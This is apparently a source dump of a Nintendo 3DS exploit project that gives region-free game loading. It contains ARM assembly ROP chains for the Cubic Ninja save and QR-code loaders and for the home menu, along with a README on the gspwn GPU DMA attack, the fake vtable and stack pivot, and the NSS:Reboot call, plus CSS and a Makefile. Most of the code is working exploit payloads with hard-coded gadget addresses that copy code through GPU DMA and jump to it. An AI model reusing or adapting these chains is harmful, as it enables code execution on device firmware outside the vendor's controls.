r7, r8, pc} 46 | .word 0xDEADBABE ; r4 (garbage) 47 | .word 0xDEADBABE ; r5 (garbage) 48 | .word 0xDEADBABE ; r6 (garbage) 49 | .word 0xDEADBABE ; r7 (garbage) 50 | .word 0xDEADBABE ; r8 (garbage) 51 | ; compare to keycombo value 52 | .word ROP_MENU_POP_R1PC ; pop {r1, pc} 53 | .word MENU_KEYCOMBO 54 | .word ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC ; cmp r0, r1 ; mvnls r0, #0 ; movhi r0, #1 ; pop {r4, pc} 55 | .word 0xDEADBABE ; r4 (garbage) 56 | ; overwrite stack pivot with NOP if equal 57 | .word ROP_MENU_POP_R2R3R4R5R6PC ; pop {r2, r3, r4, r5, r6, pc} 58 | .word MENU_OBJECT_LOC + loop_pivot - object - 0x30 ; r2 (destination - 0x30) 59 | .word 0xDEADBABE ; r3 (garbage) 60 | .word 0xDEADBABE ; r4 (garbage) 61 | .word ROP_MENU_POP_PC ; r5 (nop) 62 | .word 0xDEADBABE ; r6 (garbage) 63 | .word ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC ; streq r5, [r2, #0x30] ; pop {r4, r5, r6, pc} 64 | .word MENU_OBJECT_LOC + 4 - object ; r4 (pivot data location) 65 | .word 0xDEADBABE ; r5 (garbage) 66 | .word 0xDEADBABE ; r6 (garbage) 67 | ; execute stack pivot to loop back only if we've hit the keycombo 68 | loop_pivot: 69 | .word ROP_MENU_STACK_PIVOT 70 | 71 | ; NSS:Reboot 72 | .word ROP_MENU_POP_R0PC ; pop {r0, pc} 73 | .word 0x00000001 ; r0 (flag) 74 | .word ROP_MENU_POP_R1PC ; pop {r1, pc} 75 | .word nssRebootData + MENU_OBJECT_LOC - object ; r1 (PID followed by mediatype and reserved) 76 | .word ROP_MENU_POP_R2R3R4R5R6PC ; pop {r2, r3, r4, r5, r6, pc} 77 | .word 0x00000000 ; r2 (flag 2) 78 | .word 0xDEADBABE ; r3 (garbage) 79 | .word 0xDEADBABE ; r4 (garbage) 80 | .word 0xDEADBABE ; r5 (garbage) 81 | .word 0xDEADBABE ; r6 (garbage) 82 | .word ROP_MENU_NSS_REBOOT 83 | .word 0xDEADBABE ; (garbage) 84 | .word 0xDEADBABE ; (garbage) 85 | .word 0xDEADBABE ; (garbage) 86 | .word 0xDEADBABE ; r4 (garbage) 87 | .word 0xDEADBABE ; r5 (garbage) 88 | .word ROP_MENU_POP_R0PC ; pop {r0, pc} 89 | .word 0xFFFFFFFF ; r0 90 | .word ROP_MENU_POP_R1PC ; pop {r1, pc} 91 | .word 0x0FFFFFFF ; r1 
92 | .word MENU_SLEEP 93 | 94 | nssRebootData: 95 | .word 0x00000000 ; lower word PID (0 for gamecard) 96 | .word 0x00000000 ; upper word PID 97 | .word 0x00000002 ; mediatype (2 for gamecard) 98 | .word 0x00000000 ; reserved 99 | 100 | .Close 101 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | regionFOUR 2 | ======= 3 | 4 | regionFOUR is a region free loader for New3DS/New3DSXL/3DS/3DSXL/2DS which currently works on on firmware versions 9.0 through 9.8 (including 9.1, 9.2, 9.3, 9.4, 9.5, 9.6 and 9.7). It also allows you to bypass mandatory gamecard firmware updates. 5 | 6 | It is a successor to regionthree made to rely on an exploit game (currently cubic ninja, see below regarding other apps) rather than the web browser. as such it only requires an internet connection the first time it is run, and can then be run offline. 7 | 8 | ### How to use 9 | 10 | Please see instructions on how to run regionFOUR on its webpage : http://smealum.net/regionfour/ 11 | 12 | ### FAQ 13 | 14 | - Does this work on the latest firmware version ? Yes, 9.8 is supported. 15 | - Does this let me run homebrew and/or roms ? No, it only lets you run legit physical games from other regions. 16 | - Do I need to connect to the internet every time I want to use this ? No, you only need to connect to the internet the first time. You can then install it to your gamecard's savegame. 17 | - Do I need a flashcart/game/hardware for this ? Yes, regionFOUR currently requires that you own a copy of Cubic Ninja(see below regarding other apps) from your own region to run. 18 | - Will this work on my New 3DS ? Yes, this works on the New 3DS, the New 3DS XL, as well as the 3DS, the 3DS XL and the 2DS. 19 | - I already have an exploit installed on my copy of Cubic Ninja, how do I use regionFOUR ? 
You can uninstall any Cubic Ninja exploit by holding L + R + X + Y in Cubic Ninja's main menu. 20 | - Will this break or brick my 3DS ? No. There's virtually 0 chance of that happening : all this runs is run-of-the-mill usermode code, nothing dangerous. Nothing unusual is written to your NAND, nothing permanent is done. With that in mind, use at your own risk, I won't take responsibility if something weird does happen. 21 | - Will every game work ? No. Unfortunately, though most will, some games will not work properly with regionFOUR. One prominent example is The Legend of Zelda - Majora's Mask. 22 | - Do you take donations ? No, I do not. 23 | - How does it work ? See below. 24 | 25 | ### Technical stuff 26 | 27 | Basically I reuse some ninjhax stuff to get code exec under an application (cubic ninja). From there I use the gspwn exploit to take over home menu by overwriting a target object located on its linear heap with specially crafted data. With a fake vtable and a nice stack pivot I'm able to get ROP under home menu, and from there I ROP my way into calling NSS:Reboot to bypass the region check. 28 | 29 | For more detail on the cubic-ninja part of regionFOUR and the GPU DMA exploit (gspwn), visit http://smealum.net/?p=517 30 | 31 | To build the ROP, use Kingcom's armips assembler https://github.com/Kingcom/armips 32 | 33 | You will also need the processed blowfish key data for QR code crypto (not needed when building with --enableotherapp). It can be extracted from a ramdump or generated from exefs data : 34 | 35 | scripts/blowfish_processed.bin 36 | 37 | That done, building is very easy.
Open a terminal, cd to the ninjhax directory, and : 38 | 39 | - To build ninjhax for a single specific firmware version, use (replace "N9.2.0-22J" with firmware version; the N is for New 3DS/XL, just remove it to compile for old) : `python scripts/buildVersion.py "N9.2.0-22J"` 40 | - To build all versions : `python scripts/buildAll.py` 41 | 42 | To build with ropbin-loading enabled, use this: `python scripts/buildAll.py --enableloadropbin` or `python scripts/buildVersion.py "{version}" --enableloadropbin`. With this, the initial homemenu ROP will just stack-pivot to the ROP-chain from menu_ropbin.bin (see "firm_constants/" for the ropbin address). The ropbin comes from "menu_payload/menu_ropbin_{version}_{old/new}3ds.bin" and is embedded in cn_secondary_payload. Since this is intended for easily running general homemenu ROP (not just region-free), "menu_payload/menu_ropbin_{version}_{old/new}3ds.bin" will not be built from anything by these Makefiles. Hence, when using this option the ropbins at "menu_payload/menu_ropbin_{version}_{old/new}3ds.bin" for each version must already exist before building. 43 | 44 | To build cn_secondary_payload binaries which can then be run under non-cubicninja apps, pass the --enableotherapp option to either of the above build scripts. The built binaries are only new3ds/old3ds + system-version specific; region is not relevant for the built payload. QR code building and cn_save_initial_loader building are skipped with this option. See cn_secondary_payload/otherapp.ld for the binary base address. The payload *must* be called with r0 set to an address for a paramblk structure; see cn_secondary_payload or oot3dhax for the format of that structure.
This allows the payload to be used under any app where the exploit which loaded the payload setup a paramblk struct correctly, including OoT3D: https://github.com/yellows8/oot3dhax 45 | 46 | ### Credits 47 | 48 | - All original ROP and code on this repo written by smea 49 | - ns:s region free booting trick and home menu stack pivot found by yellows8 50 | - yellows8 and Myria for helping with testing. 51 | - plutoo <3 52 | - yellows8 for loadropbin functionality and non-cubicninja support in the payload. 53 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/sploit.s: -------------------------------------------------------------------------------- 1 | .nds 2 | 3 | .include "../../build/constants.s" 4 | 5 | .open "sploit_proto.bin","cn_save_initial_loader.bin",0x0 6 | 7 | .arm 8 | 9 | CN_CODELOCATIONVA equ (CN_HEAPPAYLOADADR+codePatch-ROP) 10 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000) 11 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000) 12 | 13 | ;length 14 | .orga 0x60 15 | .word endROP-ROP+0xA8-0x64 16 | ; .word secondaryROP-ROP+0xA8-0x64 17 | 18 | ;ROP 19 | .orga 0xA8 20 | ROP: 21 | ;jump to safer place 22 | 23 | .word 0x002c9628 ; pop {r0, pc} 24 | .word 0x0FFFFF28 ; r0 25 | .word 0x001dd62c ; ldr r0, [r0] | pop {r4, pc} 26 | .word CN_TMPVAR_ADR ; r4 (tmp var adr) 27 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 28 | .word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset) 29 | .word 0x001e2c08 ; add r0, r0, r4 | pop {r4, pc} 30 | .word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage) 31 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 32 | .word 0xDEADC0DE ; r4 (garbage) 33 | .word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc} 34 | filePayloadOffset: 35 | .word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget) 36 | 37 | secondaryROP: 38 | 39 | ;copy code to GSP heap 40 | .word 0x001bbeb8 ; pop {r3, pc} 41 | .word 0x002c9628 ; r3 (pop {r0, pc}) 42 | .word 0x00106eb8 ; pop {r4, lr} | 
bx r3 43 | .word 0xDEADC0DE ; r4 (garbage) 44 | .word 0x002c9628 ; lr (pop {r0, pc}) 45 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 46 | .word CN_TMPVAR_ADR-4 ; r0 (tmp var) 47 | .word 0x002c7784 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc} 48 | .word 0xDEADC0DE ; r3 (garbage) 49 | .word 0xDEADC0DE ; r4 (garbage) 50 | .word 0xDEADC0DE ; r5 (garbage) 51 | .word 0x002c9628 ; pop {r0, pc} 52 | .word CN_CODELOCATIONGSP-codePatch ; r0 (dst) 53 | .word 0x0020b8e8 ; pop {r2, r3, r4, pc} 54 | .word codePatchEnd ; r2 (size) 55 | .word 0xDEADC0DE ; r3 (garbage) 56 | .word 0xDEADC0DE ; r4 (garbage) 57 | .word 0x00224FB0 ; memcpy (ends in BX LR) 58 | 59 | ;flush data cache 60 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 61 | .word CN_GSPHANDLE_ADR ; r0 (handle ptr) 62 | .word 0x00226734 ; pop {r1, pc} 63 | .word 0xFFFF8001 ; r1 (kprocess handle) 64 | .word 0x0020b8e8 ; pop {r2, r3, r4, pc} 65 | .word CN_CODELOCATIONGSP ; r2 (address) 66 | .word codePatchEnd-codePatch ; r3 (size) 67 | .word 0xDEADC0DE ; r4 (garbage) 68 | .word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD SP!, {R4-R6,PC}) 69 | .word 0xDEADC0DE ; r4 (garbage) 70 | .word 0xDEADC0DE ; r5 (garbage) 71 | .word 0xDEADC0DE ; r6 (garbage) 72 | 73 | 74 | ;create GX command 75 | .word 0x001dd630 ; pop {r4, pc} 76 | 77 | .word CN_GXCOMMAND_ADR+0x0 ; r4 78 | .word 0x002c9628 ; pop {r0, pc} 79 | .word 0x00000004 80 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 81 | 82 | .word CN_GXCOMMAND_ADR+0x4 ; r4 83 | .word 0x002c9628 ; pop {r0, pc} 84 | .word CN_CODELOCATIONGSP 85 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 86 | 87 | .word CN_GXCOMMAND_ADR+0x8 ; r4 88 | .word 0x002c9628 ; pop {r0, pc} 89 | .word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0 90 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 91 | 92 | .word CN_GXCOMMAND_ADR+0xC ; r4 93 | .word 0x002c9628 ; pop {r0, pc} 94 | .word 0x00010000 95 | .word 0x001fb820 ; str r0, [r4] | 
pop {r4, pc} 96 | 97 | .word CN_GXCOMMAND_ADR+0x10 ; r4 98 | .word 0x002c9628 ; pop {r0, pc} 99 | .word 0x00000000 100 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 101 | 102 | .word CN_GXCOMMAND_ADR+0x14 ; r4 103 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 104 | 105 | .word CN_GXCOMMAND_ADR+0x18 ; r4 106 | .word 0x002c9628 ; pop {r0, pc} 107 | .word 0x00000008 108 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 109 | 110 | .word CN_GXCOMMAND_ADR+0x1C ; r4 111 | .word 0x002c9628 ; pop {r0, pc} 112 | .word 0x00000000 113 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 114 | .word 0xDEADC0DE ; r4 (garbage) 115 | 116 | ;send GX command 117 | .word 0x002c9628 ; pop {r0, pc} 118 | .word 0x356208+0x58 ; r0 119 | .word 0x00226734 ; pop {r1, pc} 120 | .word CN_GXCOMMAND_ADR ; r1 (cmd addr) 121 | .word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD SP!, {R4-R8,PC}) 122 | .word 0xDEADC0DE ; r4 (garbage) 123 | .word 0xDEADC0DE ; r5 (garbage) 124 | .word 0xDEADC0DE ; r6 (garbage) 125 | .word 0xDEADC0DE ; r7 (garbage) 126 | .word 0xDEADC0DE ; r8 (garbage) 127 | 128 | ;sleep for a second and jump to code 129 | .word 0x00226734 ; pop {r3, pc} 130 | .word 0x002c9628 ; r1 (pop {r0, pc}) 131 | .word 0x0012ec64 ; pop {r4, lr} | bx r1 132 | .word 0xDEADC0DE ; r4 (garbage) 133 | .word 0x002c9628 ; lr (pop {r0, pc}) 134 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 135 | .word 0x3B9ACA00 ; r0 = 1 second 136 | .word 0x00226734 ; pop {r1, pc} 137 | .word 0x00000000 ; r1 138 | .word 0x00293D14 ; svcSleepThread (ends in BX LR) 139 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 140 | .word 0x00000000 ; r0 (time_low) 141 | .word 0x00226734 ; pop {r1, pc} 142 | .word 0x00000000 ; r1 (time_high) 143 | .word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code 144 | 145 | .word 0xBEEF0000 146 | endROP: 147 | 148 | .align 4 149 | codePatch: 150 | .incbin "cn_initial/cn_initial.bin" 151 | .word 0xDEADDEAD 152 | .word 0xDEADDEAD 
153 | .word 0xDEADDEAD 154 | .word 0xDEADDEAD 155 | codePatchEnd: 156 | 157 | .Close 158 | -------------------------------------------------------------------------------- /web/hbrew.css: -------------------------------------------------------------------------------- 1 | html, body { 2 | height: 100%; 3 | width: 100%; 4 | padding: 0; 5 | margin: 0; 6 | } 7 | 8 | body { 9 | margin: 0px; 10 | padding: 0px; 11 | /*background: url(images/bkg.jpg) repeat #000;*/ 12 | font-family: 'Homenaje', sans-serif; 13 | font-size: 14pt; 14 | background-color: #000000; 15 | color: #B0B0B0; 16 | } 17 | 18 | 19 | h1, h2, h3 { 20 | margin: 0; 21 | padding: 0; 22 | } 23 | 24 | h2 25 | { 26 | font-weight: 400; 27 | font-family: Arial, Helvetica, sans-serif; 28 | font-size: 1.7em; 29 | } 30 | 31 | p, ol, ul { 32 | margin-top: 0px; 33 | } 34 | 35 | p { 36 | line-height: 180%; 37 | } 38 | 39 | strong { 40 | } 41 | 42 | a { 43 | color: #1492C4; 44 | text-decoration:none; 45 | } 46 | 47 | a:hover { 48 | text-decoration: none; 49 | } 50 | 51 | a img { 52 | border: none; 53 | } 54 | 55 | img.border { 56 | border: 1px solid #fff; 57 | } 58 | 59 | .video { 60 | border: 1px solid #fff; 61 | } 62 | 63 | img.alignleft { 64 | float: left; 65 | margin-right: 30px; 66 | } 67 | 68 | img.alignright { 69 | float: right; 70 | } 71 | 72 | img.aligncenter { 73 | margin: 0px auto; 74 | } 75 | 76 | hr { 77 | display: none; 78 | } 79 | 80 | #wrapper { 81 | position: relative; 82 | /*width: 1250px;*/ 83 | min-height: 600px; 84 | margin-bottom: 0px; 85 | margin-top:75px; 86 | } 87 | 88 | #wrapper { 89 | overflow: hidden; 90 | margin-right: auto; 91 | margin-left: auto; 92 | } 93 | 94 | .container { 95 | width: 1250px; 96 | margin: 0px 0px 0 0; 97 | } 98 | 99 | .clearfix { 100 | clear: both; 101 | } 102 | 103 | #header-wrapper 104 | { 105 | margin:0 0 0 0; 106 | overflow: hidden; 107 | height: 90px; 108 | margin-bottom: 5px; 109 | background: #000; 110 | position: relative; 111 | } 112 | 113 | #header { 114 | 
overflow: hidden; 115 | } 116 | 117 | #page { 118 | overflow: hidden; 119 | } 120 | 121 | #toplogo { 122 | margin: 0 auto; 123 | width:580px; 124 | } 125 | 126 | #content { 127 | margin: 0 auto; 128 | width:790px; 129 | padding: 20px 10px 20px 20px; 130 | background: #000; 131 | } 132 | 133 | #content h2 a 134 | { 135 | display: block; 136 | padding: 0px 0px 10px 0px; 137 | text-decoration: none; 138 | color: #FFFFFF; 139 | } 140 | 141 | #content #newsbox 142 | { 143 | margin-bottom: 15px; 144 | } 145 | 146 | #footer { 147 | overflow: hidden; 148 | margin: 5px auto 0 auto; 149 | padding: 10px 0px 0; 150 | background: #000; 151 | width:auto; 152 | height: 55px; 153 | } 154 | 155 | #footer p { 156 | text-align: center; 157 | font-size: 16px; 158 | } 159 | 160 | #footer a { 161 | } 162 | 163 | ul.style2 { 164 | margin: 0px; 165 | padding: 10px 0px 0px 0px; 166 | list-style: none; 167 | } 168 | 169 | ul.style2 li { 170 | clear: both; 171 | margin-bottom: 25px; 172 | padding: 30px 0px 40px 0px; 173 | border-top: none; 174 | box-shadow: inset 0 1px 0 rgba(255,255,255,.10); 175 | } 176 | 177 | ul.style1 { 178 | margin: 0px; 179 | padding: 10px 0px 0px 0px; 180 | list-style: none; 181 | } 182 | 183 | ul.style1 li { 184 | clear: both; 185 | margin-bottom: 25px; 186 | padding: 30px 0px 5px 0px; 187 | border-top: 1px solid #000000; 188 | box-shadow: inset 0 1px 0 rgba(255,255,255,.10); 189 | } 190 | 191 | ul.style1 h3 { 192 | padding-bottom: 5px; 193 | font-size: 18px; 194 | color: #FFFFFF; 195 | } 196 | 197 | ul.style1 p { 198 | line-height: 150%; 199 | } 200 | 201 | ul.style1 .button-more { 202 | float: left; 203 | margin-top: 0px; 204 | } 205 | 206 | ul.style1 .maintext { 207 | padding-top: 0px; 208 | border-top: none; 209 | box-shadow: none; 210 | } 211 | 212 | ul.style3 { 213 | margin: 0px; 214 | padding: 0px 8px; 215 | list-style: none; 216 | } 217 | 218 | ul.style3 li { 219 | padding: 10px 0px 10px 0px; 220 | border-top: 1px solid #000000; 221 | box-shadow: inset 0 1px 
0 rgba(255,255,255,.10); 222 | } 223 | 224 | ul.style3 a { 225 | text-decoration: none; 226 | color: #949494; 227 | } 228 | 229 | ul.style3 a:hover { 230 | text-decoration: none; 231 | } 232 | 233 | ul.style3 .sidebardeco { 234 | padding-top: 0px; 235 | border-top: none; 236 | box-shadow: none; 237 | } 238 | 239 | ul.style3 .date { 240 | width: 130px; 241 | background-color: #999999; 242 | margin-top: 20px; 243 | height: 24px; 244 | line-height: 24px; 245 | text-align: center; 246 | font-size: 16px; 247 | color: #FFF; 248 | -moz-border-radius: 6px; 249 | -webkit-border-radius: 6px; 250 | border: 1px solid #666; 251 | padding: 3px; 252 | } 253 | 254 | ul.style3 .date 255 | { 256 | margin-top: 0px; 257 | } 258 | 259 | .button-more 260 | { 261 | display: block; 262 | background-color: #B0B0B0; 263 | text-decoration:none; 264 | margin-top: 20px; 265 | padding: 5px 30px; 266 | height: 24px; 267 | line-height: 24px; 268 | text-align: center; 269 | color: #FFF; 270 | -moz-border-radius: 6px; 271 | -webkit-border-radius: 6px; 272 | border: 1px solid #666; 273 | padding: 3px; 274 | } 275 | .button-more a:hover 276 | { 277 | display: none; 278 | background-color: #000; 279 | margin-top: 20px; 280 | padding: 5px 30px; 281 | height: 24px; 282 | text-decoration:none; 283 | line-height: 24px; 284 | color: #000; 285 | -moz-border-radius: 12px; 286 | -webkit-border-radius: 12px; 287 | border: 4px solid #666; 288 | padding: 3px; 289 | } 290 | 291 | .entry 292 | { 293 | margin-bottom: 30px; 294 | } 295 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/sploit.s: -------------------------------------------------------------------------------- 1 | .nds 2 | 3 | .include "../../build/constants.s" 4 | 5 | .open "sploit_proto.bin","cn_qr_initial_loader.bin",0x0 6 | 7 | .arm 8 | 9 | CN_CODELOCATIONVA equ (CN_HEAPPAYLOADADR+codePatch-ROP) 10 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000) 11 | CN_TMPVAR_ADR equ 
(CN_GSPHEAP+0x000E0000) 12 | 13 | ;length 14 | .orga 0x60 15 | .word endROP-ROP+0xA8-0x64 16 | ; .word secondaryROP-ROP+0xA8-0x64 17 | 18 | ;ROP 19 | .orga 0xA8 20 | ROP: 21 | ;jump to safer place 22 | 23 | .word 0x002c9628 ; pop {r0, pc} 24 | .word 0x0FFFE358 ; r0 25 | .word 0x001dd62c ; ldr r0, [r0] | pop {r4, pc} 26 | .word 0x00000008 ; r4 27 | .word 0x001e2c08 ; add r0, r0, r4 | pop {r4, pc} 28 | .word 0xDEADC0DE ; r4 (garbage) 29 | .word 0x001dd62c ; ldr r0, [r0] | pop {r4, pc} 30 | .word CN_TMPVAR_ADR ; r4 (tmp var adr) 31 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 32 | .word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset) 33 | .word 0x001e2c08 ; add r0, r0, r4 | pop {r4, pc} 34 | .word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage) 35 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 36 | .word 0xDEADC0DE ; r4 (garbage) 37 | .word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc} 38 | filePayloadOffset: 39 | .word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget) 40 | 41 | secondaryROP: 42 | 43 | ;copy code to GSP heap 44 | .word 0x001bbeb8 ; pop {r3, pc} 45 | .word 0x002c9628 ; r3 (pop {r0, pc}) 46 | .word 0x00106eb8 ; pop {r4, lr} | bx r3 47 | .word 0xDEADC0DE ; r4 (garbage) 48 | .word 0x002c9628 ; lr (pop {r0, pc}) 49 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 50 | .word CN_TMPVAR_ADR-4 ; r0 (tmp var) 51 | .word 0x002c7784 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc} 52 | .word 0xDEADC0DE ; r3 (garbage) 53 | .word 0xDEADC0DE ; r4 (garbage) 54 | .word 0xDEADC0DE ; r5 (garbage) 55 | .word 0x002c9628 ; pop {r0, pc} 56 | .word CN_CODELOCATIONGSP-codePatch ; r0 (dst) 57 | .word 0x0020b8e8 ; pop {r2, r3, r4, pc} 58 | .word codePatchEnd ; r2 (size) 59 | .word 0xDEADC0DE ; r3 (garbage) 60 | .word 0xDEADC0DE ; r4 (garbage) 61 | .word 0x00224FB0 ; memcpy (ends in BX LR) 62 | 63 | ;flush data cache 64 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 65 | .word CN_GSPHANDLE_ADR ; r0 (handle ptr) 66 | .word 0x00226734 ; 
pop {r1, pc} 67 | .word 0xFFFF8001 ; r1 (kprocess handle) 68 | .word 0x0020b8e8 ; pop {r2, r3, r4, pc} 69 | .word CN_CODELOCATIONGSP ; r2 (address) 70 | .word codePatchEnd-codePatch ; r3 (size) 71 | .word 0xDEADC0DE ; r4 (garbage) 72 | .word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD SP!, {R4-R6,PC}) 73 | .word 0xDEADC0DE ; r4 (garbage) 74 | .word 0xDEADC0DE ; r5 (garbage) 75 | .word 0xDEADC0DE ; r6 (garbage) 76 | 77 | 78 | ;create GX command 79 | .word 0x001dd630 ; pop {r4, pc} 80 | 81 | .word CN_GXCOMMAND_ADR+0x0 ; r4 82 | .word 0x002c9628 ; pop {r0, pc} 83 | .word 0x00000004 84 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 85 | 86 | .word CN_GXCOMMAND_ADR+0x4 ; r4 87 | .word 0x002c9628 ; pop {r0, pc} 88 | .word CN_CODELOCATIONGSP 89 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 90 | 91 | .word CN_GXCOMMAND_ADR+0x8 ; r4 92 | .word 0x002c9628 ; pop {r0, pc} 93 | .word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0 94 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 95 | 96 | .word CN_GXCOMMAND_ADR+0xC ; r4 97 | .word 0x002c9628 ; pop {r0, pc} 98 | .word 0x00010000 99 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 100 | 101 | .word CN_GXCOMMAND_ADR+0x10 ; r4 102 | .word 0x002c9628 ; pop {r0, pc} 103 | .word 0x00000000 104 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 105 | 106 | .word CN_GXCOMMAND_ADR+0x14 ; r4 107 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 108 | 109 | .word CN_GXCOMMAND_ADR+0x18 ; r4 110 | .word 0x002c9628 ; pop {r0, pc} 111 | .word 0x00000008 112 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 113 | 114 | .word CN_GXCOMMAND_ADR+0x1C ; r4 115 | .word 0x002c9628 ; pop {r0, pc} 116 | .word 0x00000000 117 | .word 0x001fb820 ; str r0, [r4] | pop {r4, pc} 118 | .word 0xDEADC0DE ; r4 (garbage) 119 | 120 | ;send GX command 121 | .word 0x002c9628 ; pop {r0, pc} 122 | .word 0x356208+0x58 ; r0 123 | .word 0x00226734 ; pop {r1, pc} 124 | .word CN_GXCOMMAND_ADR ; r1 (cmd addr) 125 | 
.word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD SP!, {R4-R8,PC}) 126 | .word 0xDEADC0DE ; r4 (garbage) 127 | .word 0xDEADC0DE ; r5 (garbage) 128 | .word 0xDEADC0DE ; r6 (garbage) 129 | .word 0xDEADC0DE ; r7 (garbage) 130 | .word 0xDEADC0DE ; r8 (garbage) 131 | 132 | ;sleep for a second and jump to code 133 | .word 0x00226734 ; pop {r3, pc} 134 | .word 0x002c9628 ; r1 (pop {r0, pc}) 135 | .word 0x0012ec64 ; pop {r4, lr} | bx r1 136 | .word 0xDEADC0DE ; r4 (garbage) 137 | .word 0x002c9628 ; lr (pop {r0, pc}) 138 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 139 | .word 0x3B9ACA00 ; r0 = 1 second 140 | .word 0x00226734 ; pop {r1, pc} 141 | .word 0x00000000 ; r1 142 | .word 0x00293D14 ; svcSleepThread (ends in BX LR) 143 | ;equivalent to .word 0x002c9628 ; pop {r0, pc} 144 | .word 0x00000000 ; r0 (time_low) 145 | .word 0x00226734 ; pop {r1, pc} 146 | .word 0x00000000 ; r1 (time_high) 147 | .word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code 148 | 149 | .word 0xBEEF0000 150 | endROP: 151 | 152 | .align 4 153 | codePatch: 154 | .incbin "cn_initial/cn_initial.bin" 155 | .word 0xDEADDEAD 156 | .word 0xDEADDEAD 157 | .word 0xDEADDEAD 158 | .word 0xDEADDEAD 159 | codePatchEnd: 160 | 161 | .Close 162 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. 
export DEVKITARM=ctrulib/libctru") 7 | endif 8 | 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),) 10 | export PATH:=$(DEVKITARM)/bin:$(PATH) 11 | endif 12 | 13 | # FIRMVERSION = OLD_MEMMAP 14 | # FIRMVERSION = NEW_MEMMAP 15 | 16 | # CNVERSION = WEST 17 | # CNVERSION = JPN 18 | # ROVERSION = 1024 19 | # ROVERSION = 2049 20 | # ROVERSION = 3074 21 | # ROVERSION = 4096 22 | # SPIDERVERSION = 2050 23 | # SPIDERVERSION = 3074 24 | # SPIDERVERSION = 4096 25 | 26 | export FIRMVERSION 27 | export CNVERSION 28 | export ROVERSION 29 | export SPIDERVERSION 30 | export MENUVERSION 31 | export LOADROPBIN 32 | export OTHERAPP 33 | 34 | PAYLOAD_SRCPATH := build/cn_secondary_payload.bin 35 | 36 | ROPBIN_CMD0 := 37 | ROPBIN_CMD1 := 38 | ifneq ($(strip $(LOADROPBIN)),) 39 | ROPBIN_CMD0 := @cp build/menu_ropbin.bin cn_secondary_payload/data/ 40 | ROPBIN_CMD1 := @cp menu_payload/menu_ropbin.bin build/ 41 | endif 42 | 43 | OUTNAME = $(FIRMVERSION)_$(CNVERSION)_$(MENUVERSION) 44 | 45 | QRCODE_TARGET0 := q/$(OUTNAME).png 46 | QRCODE_TARGET1 := build/cn_save_initial_loader.bin 47 | QRCODE_TARGET1_CMD := @cp $(QRCODE_TARGET1) cn_secondary_payload/data/ 48 | 49 | ifneq ($(strip $(OTHERAPP)),) 50 | PAYLOAD_SRCPATH := cn_secondary_payload/cn_secondary_payload.bin 51 | QRCODE_TARGET0 := 52 | QRCODE_TARGET1 := 53 | QRCODE_TARGET1_CMD := 54 | endif 55 | 56 | SCRIPTS = "scripts" 57 | 58 | .PHONY: directories all menu_ropdb build/constants firm_constants/constants.txt cn_constants/constants.txt menu_ropdb/ropdb.txt 